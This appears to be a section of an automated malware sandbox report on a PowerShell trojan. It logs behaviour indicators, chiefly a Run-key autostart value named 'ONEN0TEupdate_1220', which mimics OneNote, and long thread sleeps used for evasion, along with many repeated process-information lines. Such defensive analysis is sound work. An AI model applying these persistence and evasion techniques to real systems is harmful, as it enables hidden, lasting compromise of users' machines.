Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em3oh2mh.n0i.ps1Jump to behavior
Source: classification engineClassification label: mal64.troj.evad.winPS1@4/8@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A57080A2 push esi; retf 2_2_00007FF9A57080A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A570A024 push edi; ret 2_2_00007FF9A570A039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5709F24 push edi; ret 2_2_00007FF9A5709F39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5711C57 push esp; retf 2_2_00007FF9A5711C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A57DB9DE push 8B485F9Bh; iretd 2_2_00007FF9A57DB9E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2784Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9244Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep count: 9244 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
